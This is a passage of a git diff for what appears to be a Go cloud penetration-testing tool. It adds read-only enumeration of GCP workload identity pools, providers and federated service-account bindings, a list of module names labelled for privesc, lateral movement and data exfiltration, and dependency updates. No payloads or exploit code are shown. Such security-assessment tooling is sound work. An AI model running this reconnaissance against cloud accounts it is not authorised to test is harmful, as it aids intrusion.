pool.State, + Disabled: pool.Disabled, + PoolID: poolID, + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return pools, nil +} + +// ListWorkloadIdentityProviders lists all providers in a pool +func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var providers []WorkloadIdentityProvider + parent := fmt.Sprintf("projects/%s/locations/global/workloadIdentityPools/%s", projectID, poolID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.Providers.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolProvidersResponse) error { + for _, provider := range page.WorkloadIdentityPoolProviders { + // Extract provider ID from name + providerID := extractLastPart(provider.Name) + + wip := WorkloadIdentityProvider{ + Name: provider.Name, + DisplayName: provider.DisplayName, + Description: provider.Description, + PoolID: poolID, + ProviderID: providerID, + ProjectID: projectID, + Disabled: provider.Disabled, + AttributeMapping: provider.AttributeMapping, + AttributeCondition: provider.AttributeCondition, + } + + // Determine provider type and extract specific config + if provider.Aws != nil { + wip.ProviderType = "AWS" + wip.AWSAccountID = provider.Aws.AccountId + } else if provider.Oidc != nil { + wip.ProviderType = "OIDC" + wip.OIDCIssuerURI = provider.Oidc.IssuerUri + wip.AllowedAudiences = provider.Oidc.AllowedAudiences + } else if provider.Saml != nil { + wip.ProviderType = "SAML" + } + + providers = append(providers, wip) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return providers, nil +} + +// FindFederatedIdentityBindings finds all service accounts with federated identity bindings +func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var bindings []FederatedIdentityBinding + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + saReq := iamService.Projects.ServiceAccounts.List(parent) + err = saReq.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + // Get IAM policy for this service account + policyReq := iamService.Projects.ServiceAccounts.GetIamPolicy(sa.Name) + policy, pErr := policyReq.Do() + if pErr != nil { + continue + } + + // Look for federated identity bindings + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Check if this is a federated identity + // Format: principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // Or: principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + if strings.HasPrefix(member, "principal://") || strings.HasPrefix(member, "principalSet://") { + fib := s.parseFederatedIdentityBinding(member, sa.Email, projectID) + if fib != nil { + bindings = append(bindings, *fib) + } + } + } + } + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return bindings, nil +} + +// parseFederatedIdentityBinding parses a federated identity member string +func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, projectID string) *FederatedIdentityBinding { + // principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + + fib := &FederatedIdentityBinding{ + ProjectID: projectID, + GCPServiceAccount: gcpSA, + ExternalSubject: member, + } + + // Extract pool ID + if idx := strings.Index(member, "workloadIdentityPools/"); idx != -1 { + rest := member[idx+len("workloadIdentityPools/"):] + if slashIdx := strings.Index(rest, "/"); slashIdx != -1 { + fib.PoolID = rest[:slashIdx] + } + } + + return fib +} + +// extractLastPart extracts the last part of a resource name +func extractLastPart(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/globals/gcp.go b/globals/gcp.go index 1ec42f68..42cd4ae6 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -1,15 +1,84 @@ package globals // Module names -// const GCP_WHOAMI_MODULE_NAME = "whoami" const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const GCP_BIGQUERY_MODULE_NAME string = "bigquery" const GCP_BUCKETS_MODULE_NAME string = "buckets" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" +const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" +// New module names +const GCP_FUNCTIONS_MODULE_NAME string = "functions" +const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" +const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" +const GCP_GKE_MODULE_NAME string = "gke" +const GCP_PUBSUB_MODULE_NAME string = "pubsub" +const GCP_KMS_MODULE_NAME string = "kms" +const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" +const GCP_LOGGING_MODULE_NAME string = "logging" +const GCP_NETWORKS_MODULE_NAME string = "networks" +const GCP_FIREWALL_MODULE_NAME string = "firewall" +const GCP_DNS_MODULE_NAME string = "dns" +const GCP_SCHEDULER_MODULE_NAME string = "scheduler" +const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" +const GCP_APIKEYS_MODULE_NAME string = "apikeys" +const GCP_EXPOSURE_MODULE_NAME string = "exposure" +const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" +const GCP_DATAFLOW_MODULE_NAME string = "dataflow" +const GCP_COMPOSER_MODULE_NAME string = "composer" +const GCP_MEMORYSTORE_MODULE_NAME string = "memorystore" +const GCP_FILESTORE_MODULE_NAME string = "filestore" +const GCP_SPANNER_MODULE_NAME string = "spanner" +const GCP_BIGTABLE_MODULE_NAME string = "bigtable" +const GCP_VPCSC_MODULE_NAME string = "vpc-sc" +const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity" +const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory" +const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers" +const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks" +const GCP_NOTEBOOKS_MODULE_NAME string = "notebooks" +const GCP_DATAPROC_MODULE_NAME string = "dataproc" +const GCP_IAP_MODULE_NAME string = "iap" +const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" +const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" + +// Pentest modules +const GCP_KEYS_MODULE_NAME string = "keys" +const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" +const GCP_PRIVESC_MODULE_NAME string = "privesc" +const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" +const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" +const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" +const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" +const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" +const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps" +const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" +const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" +const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" +const GCP_PRIVATESERVICECONNECT_MODULE_NAME string = "private-service-connect" +const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" +const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" + +// Resource IAM module +const GCP_RESOURCEIAM_MODULE_NAME string = "resource-iam" + +// New security analysis modules (Azure equivalents) +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +// Verbosity levels (matching Azure pattern) +var GCP_VERBOSITY int = 0 + +const GCP_VERBOSE_ERRORS = 9 + // const GCP_INVENTORY_MODULE_NAME string = "inventory" // const GCP_GCLOUD_REFRESH_TOKENS_DB_PATH = ".config/gcloud/credentials.db" // const GCP_GCLOUD_ACCESS_TOKENS_DB_PATH = ".config/gcloud/access_tokens.db" diff --git a/go.mod b/go.mod index 7e1bec1b..b46a1634 100644 --- a/go.mod +++ b/go.mod @@ -87,9 +87,12 @@ require ( require ( cel.dev/expr v0.25.1 // indirect + cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/monitoring v1.24.3 // indirect + cloud.google.com/go/orgpolicy v1.15.1 // indirect + cloud.google.com/go/osconfig v1.15.1 // indirect + cloud.google.com/go/pubsub/v2 v2.0.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -122,6 +125,7 @@ require ( github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect + go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.64.0 // indirect @@ -137,6 +141,12 @@ require ( ) require ( + cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/kms v1.23.2 + cloud.google.com/go/logging v1.13.1 + cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/pubsub v1.50.1 + cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 @@ -209,5 +219,5 @@ require ( golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect - google.golang.org/grpc v1.77.0 // indirect + google.golang.org/grpc v1.77.0 ) diff --git a/go.sum b/go.sum index 6f23c6f7..699fb8a7 100644 --- a/go.sum +++ b/go.sum @@ -1,9 +1,14 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= +cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= +cloud.google.com/go/accesscontextmanager v1.9.7/go.mod h1:i6e0nd5CPcrh7+YwGq4bKvju5YB9sgoAip+mXU73aMM= cloud.google.com/go/artifactregistry v1.18.0 h1:4qQIM1a1OymPxCODgLpXJo+097feE0i9pwpof98SimQ= cloud.google.com/go/artifactregistry v1.18.0/go.mod h1:UEAPCgHDFC1q+A8nnVxXHPEy9KCVOeavFBF1fEChQvU= +cloud.google.com/go/asset v1.22.0 h1:81Ru5hjHfiGtk+u/Ix69eaWieKpvm7Ce7UHtcZhOLbk= +cloud.google.com/go/asset v1.22.0/go.mod h1:q80JP2TeWWzMCazYnrAfDf36aQKf1QiKzzpNLflJwf8= cloud.google.com/go/auth v0.17.0 h1:74yCm7hCj2rUyyAocqnFzsAYXgJhrG26XCFimrc/Kz4= cloud.google.com/go/auth v0.17.0/go.mod h1:6wv/t5/6rOPAX4fJiRjKkJCvswLwdet7G8+UGXt7nCQ= cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= @@ -16,16 +21,28 @@ cloud.google.com/go/datacatalog v1.26.1 h1:bCRKA8uSQN8wGW3Tw0gwko4E9a64GRmbW1nCb cloud.google.com/go/datacatalog v1.26.1/go.mod h1:2Qcq8vsHNxMDgjgadRFmFG47Y+uuIVsyEGUrlrKEdrg= cloud.google.com/go/iam v1.5.3 h1:+vMINPiDF2ognBJ97ABAYYwRgsaqxPbQDlMnbHMjolc= cloud.google.com/go/iam v1.5.3/go.mod h1:MR3v9oLkZCTlaqljW6Eb2d3HGDGK5/bDv93jhfISFvU= +cloud.google.com/go/kms v1.23.2 h1:4IYDQL5hG4L+HzJBhzejUySoUOheh3Lk5YT4PCyyW6k= +cloud.google.com/go/kms v1.23.2/go.mod h1:rZ5kK0I7Kn9W4erhYVoIRPtpizjunlrfU4fUkumUp8g= cloud.google.com/go/logging v1.13.1 h1:O7LvmO0kGLaHY/gq8cV7T0dyp6zJhYAOtZPX4TF3QtY= cloud.google.com/go/logging v1.13.1/go.mod h1:XAQkfkMBxQRjQek96WLPNze7vsOmay9H5PqfsNYDqvw= cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qoboQT1E= cloud.google.com/go/longrunning v0.7.0/go.mod h1:ySn2yXmjbK9Ba0zsQqunhDkYi0+9rlXIwnoAf+h+TPY= cloud.google.com/go/monitoring v1.24.3 h1:dde+gMNc0UhPZD1Azu6at2e79bfdztVDS5lvhOdsgaE= cloud.google.com/go/monitoring v1.24.3/go.mod h1:nYP6W0tm3N9H/bOw8am7t62YTzZY+zUeQ+Bi6+2eonI= +cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTomRhc= +cloud.google.com/go/orgpolicy v1.15.1/go.mod h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= +cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= +cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= +cloud.google.com/go/pubsub v1.50.1 h1:fzbXpPyJnSGvWXF1jabhQeXyxdbCIkXTpjXHy7xviBM= +cloud.google.com/go/pubsub v1.50.1/go.mod h1:6YVJv3MzWJUVdvQXG081sFvS0dWQOdnV+oTo++q/xFk= +cloud.google.com/go/pubsub/v2 v2.0.0 h1:0qS6mRJ41gD1lNmM/vdm6bR7DQu6coQcVwD+VPf0Bz0= +cloud.google.com/go/pubsub/v2 v2.0.0/go.mod h1:0aztFxNzVQIRSZ8vUr79uH2bS3jwLebwK6q1sgEub+E= cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= cloud.google.com/go/secretmanager v1.16.0/go.mod h1://C/e4I8D26SDTz1f3TQcddhcmiC3rMEl0S1Cakvs3Q= +cloud.google.com/go/securitycenter v1.38.1 h1:D9zpeguY4frQU35GBw8+M6Gw79CiuTF9iVs4sFm3FDY= +cloud.google.com/go/securitycenter v1.38.1/go.mod h1:Ge2D/SlG2lP1FrQD7wXHy8qyeloRenvKXeB4e7zO6z0= cloud.google.com/go/storage v1.58.0 h1:PflFXlmFJjG/nBeR9B7pKddLQWaFaRWx4uUi/LyNxxo= cloud.google.com/go/storage v1.58.0/go.mod h1:cMWbtM+anpC74gn6qjLh+exqYcfmB9Hqe5z6adx+CLI= cloud.google.com/go/trace v1.11.7 h1:kDNDX8JkaAG3R2nq1lIdkb7FCSi1rCmsEtKVsty7p+U= @@ -84,6 +101,7 @@ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1 h1:WJ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1/go.mod h1:tCcJZ0uHAmvjsVYzEFivsRTN00oz5BEsRgQHu5JZ9WE= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0 h1:XRzhVemXdgvJqCH0sFfrBUTnUJSBrBf7++ypk+twtRs= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0/go.mod h1:HKpQxkWaGLJ+D/5H8QRpyQXA1eKjxkFlOMwck5+33Jk= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 h1:lhhYARPUu3LmHysQ/igznQphfzynnqI3D75oUyw1HXk= @@ -240,6 +258,7 @@ github.com/bishopfox/awsservicemap v1.1.0 h1:MM+rmGsXjkBtFR1IlS+GpVKR2srGr+V4l/J github.com/bishopfox/awsservicemap v1.1.0/go.mod h1:oy9Fyqh6AozQjShSx+zRNouTlp7k3z3YEMoFkN8rquc= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb h1:ot96tC/kdm0GKV1kl+aXJorqJbyx92R9bjRQvbBmLKU= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb/go.mod h1:2OnSqu4B86+2xGSIE5D4z3Rze9yJ/LNNjNXHhwMR+vY= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs= @@ -258,12 +277,14 @@ github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91 h1:payR github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.6.1 h1:/zMlAezfDzT2xy6acHBzwIfyu2ic0hgkT83UX5EY2gY= github.com/clipperhouse/displaywidth v0.6.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o= github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs= github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA= github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4= github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= @@ -275,12 +296,16 @@ github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= github.com/dominikbraun/graph v0.23.0 h1:TdZB4pPqCLFxYhdyMFb1TBdFxp8XLcJfTTBQucVPgCo= github.com/dominikbraun/graph v0.23.0/go.mod h1:yOjYyogZLY1LSG9E33JWZJiq5k83Qy2C6POAuiViluc= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329 h1:K+fnvUM0VZ7ZFJf0n4L/BRlnsb9pL/GuDG6FqaH+PwM= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329/go.mod h1:Alz8LEClvR7xKsrq3qzoc4N0guvVNSS8KmSChGYr9hs= github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4= @@ -313,16 +338,37 @@ github.com/golang-jwt/jwt/v4 v4.5.2 h1:YtQM7lnr8iZ+j5q71MGKkNw9Mn7AjHM68uc9g5fXe github.com/golang-jwt/jwt/v4 v4.5.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l8iNU+DwB5epxmsaqB+rhGL0m5jtYqE= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/flatbuffers v25.9.23+incompatible h1:rGZKv+wOb6QPzIdkM2KxhBZCDrA0DeN6DNmRDrqIsQU= github.com/google/flatbuffers v25.9.23+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/martian/v3 v3.3.3 h1:DIhPTQrbPkgs2yJYdXU/eNACCG5DVQjySNRNlflZ9Fc= github.com/google/martian/v3 v3.3.3/go.mod h1:iEPrYcgCF7jA9OtScMFQyAlZZ4YXTKEtJ1E6RWzmBA0= github.com/google/s2a-go v0.1.9 h1:LGD7gtMgezd8a/Xak7mEWL0PjoTQFvpRudN895yqKW0= github.com/google/s2a-go v0.1.9/go.mod h1:YA0Ei2ZQL3acow2O62kdp9UlnvMmU7kA6Eutn0dXayM= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.7 h1:zrn2Ee/nWmHulBx5sAVrGgAa0f2/R35S4DJwfFaUPFQ= @@ -380,6 +426,7 @@ github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1 github.com/pmezard/go-difflib v1.0.0/go.mod 